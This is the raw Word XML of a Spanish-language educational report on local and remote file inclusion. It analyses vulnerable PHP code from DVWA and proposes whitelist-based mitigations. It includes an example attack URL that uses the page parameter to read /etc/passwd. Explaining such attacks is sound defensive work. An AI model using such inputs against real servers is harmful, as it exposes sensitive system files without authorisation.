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3AFD2" w14:textId="26271177" w:rsidR="005C2BE0" w:rsidRPr="001872EF" w:rsidRDefault="00BF4F85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480AD" wp14:editId="60458F8D">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1034893075" name="Imagen 1" descr="un estudio sobre las vulnerabilidades local file inclusion y remote file inclusion, que sea de carácter profesional y serio ya que es para un in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estudio sobre las vulnerabilidades local file inclusion y remote file inclusion, que sea de carácter profesional y serio ya que es para un infor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C4F1B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A0C285" w14:textId="77777777" w:rsidR="002B75D0" w:rsidRDefault="002B75D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4028D" w14:textId="77777777" w:rsidR="00BF4F85" w:rsidRPr="001872EF" w:rsidRDefault="00BF4F85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2D4A4" w14:textId="5476653B" w:rsidR="001872EF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72EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>INFORME DE VULNERABILIDADES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EEE730" w14:textId="77777777" w:rsidR="00BF4F85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21C6FB" w14:textId="3FAADEC1" w:rsidR="001872EF" w:rsidRPr="001872EF" w:rsidRDefault="00BF4F85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872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>LFI Y RFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0BF6A4" w14:textId="5F7CBB14" w:rsidR="009B26AE" w:rsidRPr="001872EF" w:rsidRDefault="009B26AE" w:rsidP="001872E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F0EBDFA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21DA2" w14:textId="77777777" w:rsidR="005C2BE0" w:rsidRPr="001872EF" w:rsidRDefault="005C2BE0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35CC2" w14:textId="77777777" w:rsidR="00AF1617" w:rsidRPr="00BF4F85" w:rsidRDefault="00AF1617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9BE6D" w14:textId="062B4420" w:rsidR="00AF1617" w:rsidRPr="006866E5" w:rsidRDefault="002B75D0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866E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.- </w:t>
      </w:r>
      <w:r w:rsidR="005A6BA4" w:rsidRPr="006866E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>INTRODUCCIÓN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CABB5A0" w14:textId="5BBDD318" w:rsidR="001872EF" w:rsidRDefault="001872EF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2EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00526D35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>l presente</w:t>
      </w:r>
      <w:r w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> informe aborda las vulnerabilidades de inclusión de archivos locales (LFI) e inclusión de archivos remotos (RFI) en aplicaciones web</w:t>
      </w:r>
      <w:r w:rsidR="00526D35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, analizando dos ejemplos</w:t>
      </w:r>
      <w:r w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de código con niveles de seguridad bajo y medio, </w:t>
      </w:r>
      <w:r w:rsidR="00526D35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">donde se </w:t>
      </w:r>
      <w:r w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>explica cómo se producen estas vulnerabilidades y se proporcionan recomendaciones para mitigarlas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E21DA6" w14:textId="77777777" w:rsidR="004007F0" w:rsidRPr="001872EF" w:rsidRDefault="004007F0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63B661" w14:textId="6B10A707" w:rsidR="001872EF" w:rsidRPr="00AF1617" w:rsidRDefault="00526D35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1617">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. VULNERABILIDAD DE INCLUSIÓN DE ARCHIVOS LOCALES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26589FCD" w14:textId="18FCE935" w:rsidR="001872EF" w:rsidRPr="001872EF" w:rsidRDefault="00526D35" w:rsidP="0018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- </w:t>
      </w:r>
      <w:r w:rsidR="001872EF" w:rsidRPr="00AF1617">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Descripción</w:t>
      </w:r>
      <w:r w:rsidR="001A1D47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LFI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F40C0" w14:textId="47E61661" w:rsidR="001872EF" w:rsidRDefault="00526D35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taque guarda una estrecha relación con la vulnerabilidad “Path Traversal”</w:t>
      </w:r>
      <w:r w:rsidR="00064B1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, estableciéndose la diferencia que el primero únicamente presenta la posibilidad de modificar los parámetros de la aplicación web y escapando a contenido sensible dentro del servidor, y en un FLI, además de lo anterior, permite la ejecución de código y la inclusión de archivos en el servidor-web, normalmente, en lenguaje de programación PHP</w:t>
      </w:r>
      <w:r w:rsidR="001872EF" w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00064B1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Todo esto, </w:t>
      </w:r>
      <w:r w:rsidR="001872EF" w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>puede llevar a la exposición</w:t>
      </w:r>
      <w:r w:rsidR="00064B1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y sustracción</w:t>
      </w:r>
      <w:r w:rsidR="001872EF" w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de información sensible y, en algunos casos, a la ejecución de código malicioso</w:t>
      </w:r>
      <w:r w:rsidR="00064B1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5060E1A3" w14:textId="77777777" w:rsidR="004007F0" w:rsidRPr="001872EF" w:rsidRDefault="004007F0" w:rsidP="00526D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73D420" w14:textId="3FCA0BCA" w:rsidR="001872EF" w:rsidRPr="00651C2A" w:rsidRDefault="001872EF" w:rsidP="001872E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1C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de Código </w:t>
      </w:r>
      <w:r w:rsidR="00064B1D" w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">extraído de DVWA, de </w:t>
      </w:r>
      <w:r w:rsidR="00064B1D" w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>NIVEL BAJO</w:t>
      </w:r>
      <w:r w:rsidR="00064B1D" w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA9240" w14:textId="77777777" w:rsidR="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853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53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3E3C2C" wp14:editId="5FB4E8E2">
            <wp:extent cx="5409307" cy="1254642"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
            <wp:docPr id="18731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274" cy="12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0FA3" w14:textId="179E97DF" w:rsidR="00AF1617" w:rsidRPr="00AF1617" w:rsidRDefault="00AF1617" w:rsidP="00AF161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AF1617">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35650881" w14:textId="636B6377" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="00ED25DB" w:rsidP="008853C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pertura del Bloque PHP (&lt;?</w:t>
      </w:r>
      <w:r w:rsidR="008853CE"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hp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7456A696" w14:textId="7DD76EFB" w:rsidR="00AF1617" w:rsidRDefault="008853CE" w:rsidP="00AF1617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 xml:space="preserve">Esta etiqueta indica el inicio de un bloque de código PHP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0360199A" w14:textId="77777777" w:rsidR="004007F0" w:rsidRDefault="004007F0" w:rsidP="004007F0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</w:p>
    <w:p w14:paraId="36DC7517" w14:textId="77777777" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853C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Comentario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(// The page we wish to display</w:t>
      </w:r>
      <w:r w:rsidRPr="008853CE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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4284CC5F" w14:textId="1792CF4D" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853CE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e es un comentario en línea que explica que la variable </w:t>
      </w:r>
      <w:r w:rsidR="00ED25DB" w:rsidRP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“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</w:t>
      </w:r>
      <w:r w:rsidR="00ED25DB" w:rsidRP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contendrá la página que deseamos mostrar. Los comentarios en PHP se inician con // y se extienden hasta el final de la línea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1381E" w14:textId="77777777" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853CE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Asignación de la Variable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72F2CE68" w14:textId="224AA298" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853CE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_GET['page']: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st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 comando d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HP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tiene los datos enviados a través de la URL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sando el método GET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proofErr w:type="gramStart"/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y ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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n este caso,  </w:t>
      </w:r>
      <w:r w:rsidR="00ED25D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á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ccediendo al parámetro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  <w:r w:rsid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“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page</w:t>
      </w:r>
      <w:r w:rsidR="00ED25DB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 la URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C2BF4" w14:textId="4DD218B2" w:rsidR="004007F0" w:rsidRPr="004007F0" w:rsidRDefault="008853CE" w:rsidP="004007F0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 = $_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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GET[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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'page'];: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sta línea asigna el valor del parámetro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pag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de la URL a la variable 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$file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36713225" w14:textId="12C3BF54" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="004007F0" w:rsidP="004007F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u w:val="single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2.</w:t>
      </w:r>
      <w:r w:rsidR="00423A7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2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  <w:r w:rsidR="00423A7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1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- </w:t>
      </w:r>
      <w:r w:rsidRPr="004007F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Vulnerable a LFI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es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> o inclusión de archivos locales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D8085" w14:textId="5BDA2BCD" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="004007F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ste código es vulnerable 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 la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Inclusión de Archivos Locales (LFI)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n lo que u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ctor malicioso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p</w:t>
      </w:r>
      <w:r w:rsidR="004007F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odría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manipular el parámetro </w:t>
      </w:r>
      <w:r w:rsidR="004007F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“</w:t>
      </w:r>
      <w:r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page</w:t>
      </w:r>
      <w:r w:rsid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”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n la URL para incluir archivos locales del servidor. Por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4858484E" w14:textId="1EBCCE4F" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="007702D5" w:rsidP="00885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ab/>
      </w:r>
      <w:r w:rsidR="008853CE" w:rsidRPr="008853CE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http://example.com/index.php?page=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B125D" w14:textId="3C74FDD6" w:rsidR="007702D5" w:rsidRDefault="008853CE" w:rsidP="004007F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i el código posteriormente incluye el archivo especificado en $file sin ninguna validación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listas blancas, etc)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el atacante podría acceder a archivos sensibles del sistema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, y si el código incluyera el comando </w:t>
      </w:r>
      <w:r w:rsidR="007702D5" w:rsidRPr="007702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Include=$file</w:t>
      </w:r>
      <w:r w:rsidR="007702D5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, </w:t>
      </w:r>
      <w:r w:rsidR="007702D5" w:rsidRP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ntonces el atacante no solo </w:t>
      </w:r>
      <w:r w:rsidR="00661039" w:rsidRP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odría</w:t>
      </w:r>
      <w:r w:rsidR="007702D5" w:rsidRP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cceder y observar el contenido sensible, sino que podría ejecutar código malicioso</w:t>
      </w:r>
      <w:r w:rsidR="007702D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24AE8D8B" w14:textId="1DA9E655" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="004007F0" w:rsidP="004007F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2.</w:t>
      </w:r>
      <w:r w:rsidR="00423A7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2.2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- </w:t>
      </w:r>
      <w:r w:rsidR="008853CE" w:rsidRPr="008853CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Mitigación</w:t>
      </w:r>
      <w:r w:rsidR="009D6B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> del riesgo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5778DEF1" w14:textId="5F4986FA" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="004007F0">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="36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ara mitigar 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los efectos de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a vulnerabilidad, es crucial validar y sanitizar todas las entradas del usuario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, con alguna/s de las siguientes recomendaciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530DAE66" w14:textId="2A7EB8D3" w:rsidR="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853C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lidar la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trada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s, asegurando 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que solo se puedan incluir archivos permitidos.</w:t>
      </w:r>
      <w:r w:rsidR="00AF1617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jemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D0043" w14:textId="506E6AB0" w:rsidR="004007F0" w:rsidRPr="004007F0" w:rsidRDefault="004007F0" w:rsidP="00F15E4D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1068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lastRenderedPageBreak/>
        <w:t xml:space="preserve">//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verifica si existe el archivo o identificador asociado a page, y si es válido incluye el archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1C017" w14:textId="64276181" w:rsidR="004007F0" w:rsidRDefault="00AF1617" w:rsidP="00F15E4D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="978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</w:pPr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if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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allowed_pages</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[$page])) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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{  </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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     </w:t>
      </w:r>
      <w:r w:rsidR="004007F0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ab/>
      </w:r>
      <w:r w:rsidR="004007F0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ab/>
      </w:r>
      <w:r w:rsidR="00F15E4D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       </w:t>
      </w:r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include($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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allowed_pages</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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[$page])</w:t>
      </w:r>
      <w:r w:rsidR="004007F0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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5AD866" w14:textId="2C7D84CA" w:rsidR="004007F0" w:rsidRPr="004007F0" w:rsidRDefault="00F15E4D" w:rsidP="00F15E4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    </w:t>
      </w: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/</w:t>
      </w:r>
      <w:r w:rsidR="004007F0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/En caso contrario, le </w:t>
      </w:r>
      <w:r w:rsid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incluirá un código de error 404.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE3FDF" w14:textId="635BA569" w:rsidR="004007F0" w:rsidRDefault="00F15E4D" w:rsidP="00F15E4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   </w:t>
      </w:r>
      <w:r w:rsidR="00AF1617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} </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AF1617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else</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF1617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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65488ECB" w14:textId="3EFE8A40" w:rsidR="004007F0" w:rsidRPr="004007F0" w:rsidRDefault="00F15E4D" w:rsidP="00F15E4D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 xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004007F0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i</w:t>
      </w:r>
      <w:r w:rsidR="00AF1617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nclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF1617" w:rsidRPr="004007F0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('404.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B399E4" w14:textId="3800B7FB" w:rsidR="00AF1617" w:rsidRPr="008853CE" w:rsidRDefault="000041C8" w:rsidP="000041C8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ab/>
      </w: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ab/>
      </w:r>
      <w:r w:rsidR="00AF1617" w:rsidRPr="00AF1617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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE859A4" w14:textId="0DB808B0" w:rsidR="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853C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tilizar Listas Blancas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que p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rmit</w:t>
      </w:r>
      <w:r w:rsidR="00661039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n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r w:rsidR="00505170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únicamente</w:t>
      </w:r>
      <w:r w:rsidRPr="008853CE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archivos específicos que sean seguros.</w:t>
      </w:r>
      <w:r w:rsidR="00AF1617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Ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A4D96" w14:textId="77777777" w:rsidR="009D6B8B" w:rsidRDefault="00AF1617" w:rsidP="009D6B8B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1416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AF1617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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF1617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allowed_pages</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF1617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 = array (“home”, “a</w:t>
      </w:r>
      <w:r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bout”, “contact”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4251C725" w14:textId="71C8D8A4" w:rsidR="00505170" w:rsidRPr="009D6B8B" w:rsidRDefault="008853CE" w:rsidP="009D6B8B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista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vitar la Inclusión Directa de Archivos </w:t>
      </w:r>
      <w:r w:rsidR="00505170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por </w:t>
      </w:r>
      <w:r w:rsidR="00661039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</w:t>
      </w:r>
      <w:r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ntrada del </w:t>
      </w:r>
      <w:r w:rsidR="00505170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u</w:t>
      </w:r>
      <w:r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uario</w:t>
      </w:r>
      <w:r w:rsidR="00505170" w:rsidRPr="009D6B8B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y usar un mapeo seguro de nombres de archivos. Por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208C517F" w14:textId="27FD699E" w:rsidR="00505170" w:rsidRPr="00505170" w:rsidRDefault="00505170" w:rsidP="00505170">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:ind w:left="1080"/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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF1617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</w:rPr>
        <w:t xml:space="preserve">    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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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allowed_pages</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421F28EA" w14:textId="6E58B915" w:rsidR="00505170" w:rsidRPr="00505170" w:rsidRDefault="00505170" w:rsidP="00505170">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:ind w:left="1440"/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</w:pP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home'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=&gt;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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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home.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40716031" w14:textId="01A551A8" w:rsidR="00505170" w:rsidRPr="00505170" w:rsidRDefault="00505170" w:rsidP="00505170">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:ind w:left="1440"/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</w:pP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about'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=&gt;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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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about_us.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588400B4" w14:textId="55150323" w:rsidR="00505170" w:rsidRPr="00505170" w:rsidRDefault="00505170" w:rsidP="00505170">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:ind w:left="1440"/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</w:pP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contact'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=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00505170"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 xml:space="preserve"> </w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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contact_form.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B62B214" w14:textId="23E26C26" w:rsidR="00505170" w:rsidRPr="00505170" w:rsidRDefault="00505170" w:rsidP="00505170">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML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</w:pPr>
      <w:r w:rsidRPr="00505170">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BEF7A" w14:textId="217E35DD" w:rsidR="00505170" w:rsidRDefault="00505170" w:rsidP="00505170">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevi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95D28AA" w14:textId="2B62471F" w:rsidR="009D6B8B" w:rsidRDefault="00505170" w:rsidP="009D6B8B">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/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505170">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Esto es un array q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ue asocia o mapea un </w:t>
      </w:r>
      <w:r w:rsidR="00E62B2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>identificador a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cada recurso </w:t>
      </w:r>
      <w:r w:rsidR="00E62B2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o archivo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> real del sistema</w:t>
      </w:r>
      <w:r w:rsidR="00E62B2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. El usuario solo tendrá acceso al identificador, proporcionándole una capa de protección adicional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E201002" w14:textId="77777777" w:rsidR="009D6B8B" w:rsidRDefault="009D6B8B" w:rsidP="009D6B8B">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7E8C94" w14:textId="45EDC80A" w:rsidR="008853CE" w:rsidRDefault="008853CE" w:rsidP="009D6B8B">
      <w:pPr>
